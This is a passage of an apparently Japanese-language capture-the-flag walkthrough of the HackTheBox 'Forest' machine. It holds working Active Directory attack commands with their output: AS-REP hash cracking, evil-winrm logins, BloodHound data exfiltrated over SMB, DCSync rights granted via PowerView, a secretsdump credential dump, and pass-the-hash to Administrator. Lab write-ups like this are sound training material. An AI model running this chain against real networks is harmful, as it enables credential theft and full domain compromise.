$krb5asrep$23$svc-alfresco@HTB.LOCAL:cbd577ae0861f45dd45cf18f0d9d5c87$bb392348e764c3a49420641f9db50845ff0422761d3d4290f3d2de50e950b650686cdbdccaa43d76d506349379406b529136ac8ad8a3ebfe6089f7b5e8095691d560b6ebd1ff5783e13e720981110aac2cc38deedb8a1d7421f8ee5c3cb5ecd0ef4a0c64d6210d709468d0796936f41218c8f02d044491d2613bda35f60e9ccb150c4df5cbfc8b7d53d73c14262b716d69f7dc3aa250e6a05808d19359af37b36f511345d262745b4dd80cfbf6d0173d08b1ced3e3543dac057cbd5b7242ad9b5c8b719430e3581e3080e55b4122a0c96cbbd4c1a2aa9359c25c431c95701ce5cf194e63d9d2
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
svc-alfrescoというユーザーのハッシュ値が手に入った。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# cat hashes.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:cbd577ae0861f45dd45cf18f0d9d5c87$bb392348e764c3a49420641f9db50845ff0422761d3d4290f3d2de50e950b650686cdbdccaa43d76d506349379406b529136ac8ad8a3ebfe6089f7b5e8095691d560b6ebd1ff5783e13e720981110aac2cc38deedb8a1d7421f8ee5c3cb5ecd0ef4a0c64d6210d709468d0796936f41218c8f02d044491d2613bda35f60e9ccb150c4df5cbfc8b7d53d73c14262b716d69f7dc3aa250e6a05808d19359af37b36f511345d262745b4dd80cfbf6d0173d08b1ced3e3543dac057cbd5b7242ad9b5c8b719430e3581e3080e55b4122a0c96cbbd4c1a2aa9359c25c431c95701ce5cf194e63d9d2
Brute force Attack
John the RipperかHashcatを使ってパスワードクラックをしていく。
自分はJohn the Ripperの方が使い慣れているためJohnをつかうが、どちらでもおk。
wordlistがない方はこちらから入手。
Brute force Attack !!
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:06 DONE (2024-01-06 17:56) 0.1517g/s 620304p/s 620304c/s 620304C/s s521379846..s2698813
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ユーザーはsvc-alfresco パスワードはs3rviceとわかった。
winrmで実際に接続を試してみよう。
WinRMって?
Windows Remote Managementの略。Microsoft Windowsシステムのリモート管理をサポートするためのプロトコルおよびサービスのこと。これをつかって、Windowsマシンにリモートで接続してコマンドを実行したり、設定を変更したりすることができる。
うまく接続できたようだ。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
探索していく。
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> dir
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/5/2024 9:53 PM 34 user.txt
user.txt発見!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のUserFlag
Previlege Escalation
RootFlagゲットのために権限昇格をめざしていく。
SharpHound
BloodHoundを使いたいので、そのために必要なデータを集めてくれるSharpHoundを使っていく。
BloodHoundって?
BloodHoundは、Active Directory環境の特権アクセスと権限昇格の経路をグラフによって可視化できちゃうツール。
SharpHoundはBloodHound内にある(/BloodHound/Collectors)ため、こちらをgit clone等で手に入れておく。
Kali to Target Machine
SharpHoundをターゲットマシンに送りたい。そのために、サーバを立てておこう。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# python3 -m http.server 80 --bind=10.10.14.4
ターゲットマシンでInvoke-WebRequestを実行して手にいれる。
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-WebRequest -Uri http://10.10.14.4/SharpHound.exe -UseBasicParsing -OutFile SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/6/2024 5:09 AM 1046528 SharpHound.exe
SharpHound実行!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe
2024-01-06T05:17:17.1597131-08:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-01-06T05:17:17.3003471-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-06T05:17:17.3315902-08:00|INFORMATION|Initializing SharpHound at 5:17 AM on 1/6/2024
2024-01-06T05:17:17.6597265-08:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-01-06T05:17:17.7847127-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-01-06T05:17:18.1440886-08:00|INFORMATION|Beginning LDAP search for htb.local
2024-01-06T05:17:18.2222151-08:00|INFORMATION|Producer has finished, closing LDAP channel
2024-01-06T05:17:18.2222151-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-01-06T05:17:48.3942902-08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2024-01-06T05:18:01.5191814-08:00|INFORMATION|Consumers finished, closing output channel
2024-01-06T05:18:01.5504290-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-01-06T05:18:01.6598031-08:00|INFORMATION|Status: 161 objects finished (+161 3.744186)/s -- Using 48 MB RAM
2024-01-06T05:18:01.6754272-08:00|INFORMATION|Enumeration finished in 00:00:43.5327262
2024-01-06T05:18:01.7535544-08:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-01-06T05:18:01.7535544-08:00|INFORMATION|SharpHound Enumeration Completed at 5:18 AM on 1/6/2024! Happy Graphing!
実行するとBloodHoundのzipファイルが手に入る。今度はこれをKaliに送る。
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/6/2024 5:18 AM 18689 20240106051800_BloodHound.zip
-a---- 1/6/2024 5:18 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 1/6/2024 5:09 AM 1046528 SharpHound.exe
Target Machine to Kali
Kaliでsmbserver.pyを使い、SMBサーバーを起動させておく。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali /home/kali/Desktop/work
Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra
ターゲットマシンから送る
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Copy-Item -Path .\20240106051800_BloodHound.zip -Destination \\10.10.14.4\kali
手に入った。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# ls -lta
total 6352
drwxr-xr-x 7 kali kali 4096 Jan 7 18:05 .
-rwxr-xr-x 1 root root 18689 Jan 6 22:18 20240106051800_BloodHound.zip
-rw-r--r-- 1 root root 1046528 Jan 6 21:39 SharpHound.exe
drwxr-xr-x 7 root root 4096 Jan 6 21:37 BloodHound
-rw-r--r-- 1 root root 531 Jan 6 17:42 hashes.txt
-rw-r--r-- 1 root root 530 Jan 6 17:28 Usernames.txt
-rw-r--r-- 1 root root 1119 Jan 6 17:09 users.txt
drwxr-xr-x 3 kali kali 4096 Jan 5 11:51 ..
-r
BloodHound
BloodHoundを使っていこう。BloodHoundを使うには色々な設定が必要になってくるので、こちらを参考に。
bloodhoundとコマンドを打つとこのような画面が起動する。
先ほどのzipファイルをドラッグ&ドロップ。svc-alfrescoを検索してみる。
ユーザーが見つかる。このユーザーには侵入成功しているためMark User as Ownedでマークしておく。
Analysis
経路を見て分析しつつ、攻撃方法を考えていこう。
様々な分析オプションから経路を見ることができるので、試してみるとよい。
Find Shortest Path to Domain Admins
Shortest Path to Domain Admins from Owned Principals
Shortest Path From Owned Principals
Analysis Outcome
分析の結果、以下のことがわかった。
① svc-alfrescoはService Accountsに属している。
② Service AccountsはPrivileged IT Accountsのメンバー。
③ Privileged IT AccountsはAccount Operatorsのメンバー。
④ Account OperatorsはExchange Windows Permissionsに対し、GenericAllのパーミッションが与えられている。
GenericAllとは広範囲なアクセス権を持つことができるパーミッションだ。
これによって、グループにユーザーを追加したりユーザーのパスワードをリセットしたりする機能を含むようなすべてのプロパティへの書き込みアクセスを可能にする。
"最強"パーミッションなのだ!
Attacking Scenario
攻撃シナリオもこれらのことから考えることができる。
① Account Operatorsの特権を使用して、新たなユーザーを作成。
② 作成したユーザーをExchange Windows Permissionsに属させる。
③ リモートアクセス権取得のためにemote Management Usersにも属させる。
④ DCSync Attack!
まずは①から進めていくことにしよう。
その前にPowerViewを使っていきたいので、送り込んでいく。
サーバーと同じ階層にダウンロードしておく。
先ほどKali to Target Machineで説明した手順と同様にして送り込む。
このコマンドで起動させておく。
Import-Module .\PowerView.ps1
- Account Operatorsの特権を使用して、新たなユーザーを作成 -
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> New-ADUser -Name "GenkaiChan" -SamAccountName "GenkaiChan" -AccountPassword (ConvertTo-SecureString "GenkaiChan" -AsPlainText -Force) -Enabled $true
- 作成したユーザーをExchange Windows Permissionsに属させる。 -
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members "GenkaiChan"
- リモートアクセス権取得のためにRemote Management Usersにも属させる。 -
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ADGroupMember -Identity "Remote Management Users" -Members "GenkaiChan"
GenkaiChanとして接続が成功した。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# evil-winrm -i 10.10.10.161 -u GenkaiChan -p GenkaiChan
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\GenkaiChan\Documents>
ちゃんと所属もしているようだ。
*Evil-WinRM* PS C:\Users\GenkaiChan\Documents> Get-ADPrincipalGroupMembership -Identity GenkaiChan | Select-Object Name
Name
----
Domain Users
Remote Management Users
Exchange Windows Permissions
DCSync Attack
DCSync Attackって?
DCSync Attackは、Active Directory内のハッシュや認証情報を取得するための攻撃手法。これを使うと、攻撃者はActive Directoryのドメインコントローラーから特定のユーザーアカウントのNTLMハッシュを手に入れることができる。
早速やっていこう。
DCSync権限を先ほど作ったユーザーに与えておく。
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity GenkaiChan -Rights DCSync
Mimikatzを使用してのExploitを試みたが、失敗したため今回はKali側から攻撃を仕掛けていこう。
これを使っていく。
┌──(root㉿kali)-[/home/…/Desktop/work/impacket/examples]
└─# python3 secretsdump.py htb/GenkaiChan:GenkaiChan@10.10.10.161
Impacket v0.12.0.dev1+20231114.165227.4b56c18a - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
GenkaiChan:9601:aad3b435b51404eeaad3b435b51404ee:79212aed4ff5fdb3c8af2306e4d2229d:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:8f694fce6f200771263f76f2f3dabd28:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
GenkaiChan:aes256-cts-hmac-sha1-96:56c9d9c5f0ab76986330c5dd77d7dbd50392c2134d40c8934859a04b6de1f7d2
GenkaiChan:aes128-cts-hmac-sha1-96:a50ec83ebbc5a82e9f11787cd45dd23f
GenkaiChan:des-cbc-md5:5b733e49f84f85a2
FOREST$:aes256-cts-hmac-sha1-96:2d4238ad5acaf79efe019a2e768d9788c29f5dcb56570cbac0b57fbd8eb45744
FOREST$:aes128-cts-hmac-sha1-96:4366f3c8087e17e8dfd3faf64636c069
FOREST$:des-cbc-md5:896457320eae0bba
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
ここに注目。
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
ユーザー名とハッシュを手にいれることに成功した。
Pass the Hash Attack
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
うまくいったようだ。
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/23/2019 3:46 PM 770279 PowerView.ps1
-ar--- 10/6/2019 12:46 PM 664 revert.ps1
-ar--- 9/23/2019 3:05 PM 51 users.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/20/2019 4:04 PM Contacts
d-r--- 9/23/2019 2:15 PM Desktop
d-r--- 9/23/2019 3:46 PM Documents
d-r--- 9/20/2019 4:04 PM Downloads
d-r--- 9/20/2019 4:04 PM Favorites
d-r--- 9/20/2019 4:04 PM Links
d-r--- 9/20/2019 4:04 PM Music
d-r--- 9/20/2019 4:04 PM Pictures
d-r--- 9/20/2019 4:04 PM Saved Games
d-r--- 9/20/2019 4:04 PM Searches
d-r--- 9/20/2019 4:04 PM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/6/2024 11:34 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のRootFlag
よしゃ!
あとがき
Active Directoryの理解ができていないと難しいBoxだったのではないでしょうか。
いい勉強になりますね。🍃